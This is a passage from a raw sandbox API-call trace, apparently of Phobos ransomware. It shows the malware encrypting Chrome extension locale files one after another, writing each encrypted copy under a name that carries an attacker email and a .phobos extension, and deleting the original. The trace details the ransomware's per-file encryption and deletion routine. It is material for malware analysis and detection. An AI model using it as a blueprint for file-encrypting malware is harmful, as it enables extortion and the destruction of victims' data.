HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.702] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0151.702] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.702] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.703] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.703] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.704] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0151.704] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.704] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.704] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.704] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.704] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.704] CloseHandle (hObject=0x188) returned 1 [0151.704] CloseHandle (hObject=0x148) returned 1 [0151.704] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json")) returned 1 [0151.705] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.706] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.706] CloseHandle (hObject=0x148) returned 1 [0151.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json")) returned 0x2020 [0151.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.706] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.706] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.706] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0151.706] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.706] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.709] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.709] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.710] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0151.710] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.710] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.710] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.710] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.710] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.710] CloseHandle (hObject=0x148) returned 1 [0151.710] CloseHandle (hObject=0x188) returned 1 [0151.711] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json")) returned 1 [0151.711] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.712] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.712] CloseHandle (hObject=0x188) returned 1 [0151.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json")) returned 0x2020 [0151.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.712] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.712] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.712] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0151.712] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.712] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.713] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.713] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.714] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0151.714] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.714] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.714] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.714] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.714] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.714] CloseHandle (hObject=0x188) returned 1 [0151.714] CloseHandle (hObject=0x148) returned 1 [0151.715] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json")) returned 1 [0151.715] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.716] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.716] CloseHandle (hObject=0x148) returned 1 [0151.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json")) returned 0x2020 [0151.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.716] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.716] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0151.716] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.716] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.717] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.717] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.718] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0151.718] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.718] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.718] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.718] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.718] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.718] CloseHandle (hObject=0x148) returned 1 [0151.719] CloseHandle (hObject=0x188) returned 1 [0151.719] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json")) returned 1 [0151.720] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.720] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.720] CloseHandle (hObject=0x188) returned 1 [0151.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json")) returned 0x2020 [0151.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.720] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.720] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.721] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0151.721] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.721] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.728] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.728] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.729] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: 